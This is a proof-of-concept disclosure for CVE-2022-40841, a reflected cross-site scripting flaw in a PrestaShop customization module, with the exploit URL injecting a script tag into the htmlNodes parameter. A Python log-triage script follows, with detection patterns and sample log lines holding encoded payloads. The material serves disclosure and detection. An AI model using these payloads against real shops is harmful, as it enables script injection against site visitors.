CVE-2022-40841: cve-s/poc.txt at main · daaaalllii/cve-s
A cross-site scripting (XSS) vulnerability in NdkAdvancedCustomizationFields v3.5.0 allows attackers to execute arbitrary web scripts or HTML via crafted payloads injected into the “htmlNodes” parameter.
# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 Reflected cross site scripting (xss)
# Date: 01-11-2022
# Exploit Author: dalii
# Vendor Homepage: https://www.ndk-design.fr/
# Software Link : https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english
# Version: 3.5.0
# Tested on: Windows 10
# CVE: CVE-2022-40841
Parameters: htmlNodes
Exploit:
http://localhost/modules/ndk_advanced_custom_fields/showPreview.php?htmlNodes=<script>alert('xss')</script>
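
Detection example (added here, not part of the original PoC or the module's code): a log triage script that flags requests to showPreview.php whose htmlNodes value decodes to script-capable markup. The combined access-log format, the markup heuristic and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter named in the advisory above.
VULN_PATH = "/modules/ndk_advanced_custom_fields/showPreview.php"
PARAM = "htmlNodes"

# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic for script-capable markup; a triage signal, not a complete XSS filter.
MARKUP_RE = re.compile(r"<\s*script|\bon[a-z]+\s*=|javascript\s*:", re.I)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%253C -> %3C -> <), bounded to max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for endpoint hits whose htmlNodes carries markup."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if target.path.lower() != VULN_PATH.lower():
            continue  # only the endpoint from the advisory is in scope
        for raw in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)  # parse_qs already decoded once
            if MARKUP_RE.search(value):
                hits.append((n, value))
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Nov/2022:10:00:01 +0000] "GET /modules/ndk_advanced_custom_fields/showPreview.php?htmlNodes=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Nov/2022:10:00:02 +0000] "GET /modules/ndk_advanced_custom_fields/showPreview.php?htmlNodes=preview HTTP/1.1" 200 498',
    '203.0.113.5 - - [01/Nov/2022:10:00:03 +0000] "GET /modules/ndk_advanced_custom_fields/showPreview.php?htmlNodes=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Nov/2022:10:00:04 +0000] "GET /index.php?q=%3Cscript%3E HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: {PARAM}={value!r}")
```

Hits mean the request reached the vulnerable endpoint with markup in the reflected parameter; whether the response echoed it unescaped still has to be confirmed against the installed module version.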